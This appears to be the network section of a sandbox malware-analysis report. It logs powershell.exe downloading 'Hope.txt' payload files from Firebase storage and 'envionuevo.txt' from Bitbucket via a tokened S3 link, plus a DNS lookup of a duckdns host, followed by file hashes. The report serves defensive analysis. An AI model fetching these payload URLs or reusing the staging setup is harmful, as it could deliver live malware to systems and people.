Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
x-amz-request-id: GZH6QFC5Z1XG7HJE
Date: Fri, 09 Aug 2024 01:27:28 GMT
Last-Modified: Tue, 06 Aug 2024 17:22:59 GMT
ETag: "aabd1a604f1a4028c9aed366338df3d0"
x-amz-server-side-encryption: AES256
x-amz-version-id: qJpdLnwvfTZhq5WLC.X4QTcIdjWQ3Hyy
Content-Disposition: attachment; filename="envionuevo.txt"
Accept-Ranges: bytes
Content-Type: text/plain
Server: AmazonS3
Content-Length: 64856
-
Remote address:8.8.8.8:53Request9.141.166.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request225.165.217.52.in-addr.arpaIN PTRResponse225.165.217.52.in-addr.arpaIN PTRs3-1-w.amazonaws.com
-
Remote address:8.8.8.8:53Requestzorra123.duckdns.orgIN AResponsezorra123.duckdns.orgIN A181.235.3.72
-
Remote address:8.8.8.8:53Request72.3.235.181.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request86.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request18.31.95.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
172.217.168.202:443https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362tls, httppowershell.exe1.9kB 48.5kB 26 41
HTTP Request
GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffeHTTP Response
200HTTP Request
GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362HTTP Response
200 -
204.79.197.237:443https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=tls, http22.0kB 9.3kB 22 19
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=HTTP Response
204 -
185.166.141.9:443https://bitbucket.org/dcasdc/descargas/downloads/envionuevo.txttls, httppowershell.exe803 B 8.7kB 9 11
HTTP Request
GET https://bitbucket.org/dcasdc/descargas/downloads/envionuevo.txtHTTP Response
302 -
52.217.165.225:443https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315tls, httppowershell.exe3.2kB 73.7kB 36 64
HTTP Request
GET https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315HTTP Response
200 -
7.0kB 6.0kB 62 60
-
76 B 220 B 1 1
DNS Request
firebasestorage.googleapis.com
DNS Response
172.217.168.202 142.251.39.106 142.250.179.138 172.217.23.202 142.250.179.170 142.251.36.42 142.251.36.10 142.250.179.202 216.58.214.10
-
56 B 151 B 1 1
DNS Request
g.bing.com
DNS Response
204.79.197.237 13.107.21.237
-
74 B 113 B 1 1
DNS Request
202.168.217.172.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
20.160.190.20.in-addr.arpa
-
73 B 143 B 1 1
DNS Request
237.197.79.204.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
59 B 107 B 1 1
DNS Request
bitbucket.org
DNS Response
185.166.141.9 185.166.141.8 185.166.141.7
-
76 B 254 B 1 1
DNS Request
bbuseruploads.s3.amazonaws.com
DNS Response
52.217.165.225 52.216.29.148 3.5.30.67 52.216.52.161 3.5.28.116 3.5.28.213 3.5.29.163 3.5.2.158
-
72 B 132 B 1 1
DNS Request
9.141.166.185.in-addr.arpa
-
73 B 107 B 1 1
DNS Request
225.165.217.52.in-addr.arpa
-
66 B 82 B 1 1
DNS Request
zorra123.duckdns.org
DNS Response
181.235.3.72
-
71 B 137 B 1 1
DNS Request
72.3.235.181.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
86.23.85.13.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
18.31.95.13.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82